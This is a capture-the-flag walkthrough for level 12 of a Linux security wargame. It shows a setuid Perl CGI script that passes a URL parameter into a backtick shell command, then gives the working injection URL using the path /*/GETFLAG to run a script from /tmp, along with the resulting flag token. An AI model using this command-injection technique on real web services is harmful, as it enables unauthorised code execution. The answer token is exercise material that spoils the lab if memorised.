# Level 12 instructions:

## Check home directory:
```
$ ls -l
total 4
-rwsr-sr-x+ 1 flag12 level12 464 Mar  5  2016 level12.pl
```

## See contents of script:
```
$ cat level12.pl
#!/usr/bin/env perl
# localhost:4646
use CGI qw{param};
print "Content-type: text/html\n\n";

sub t {
  $nn = $_[1];
  $xx = $_[0];
  $xx =~ tr/a-z/A-Z/;
  $xx =~ s/\s.*//;
  @output = `egrep "^$xx" /tmp/xd 2>&1`;
  foreach $line (@output) {
      ($f, $s) = split(/:/, $line);
      if($s =~ $nn) {
          return 1;
      }
  }
  return 0;
}

sub n {
  if($_[0] == 1) {
      print("..");
  } else {
      print(".");
  }
}

n(t(param("x"), param("y")));
```

We can exploit the fact that it uses command-line interpolation by feeding it an executable script.
The comment at the top suggests that this script is attached to http port 4646.

## Make script to exploit:
```
<Find GETFLAG in Resources>
$ chmod 777 /tmp/GETFLAG
``` 

## Invoke script from web browser:
Navigate to ``192.168.56.101:4646/?x=`/*/GETFLAG` `` from your web browser.
You should now get a message in your console giving you the flag:
```
Broadcast Message from flag12@Snow
        (somewhere) at 11:27 ...

Check flag.Here is your token : g1qKMiRpXf53AWhDaU7FEkczr
```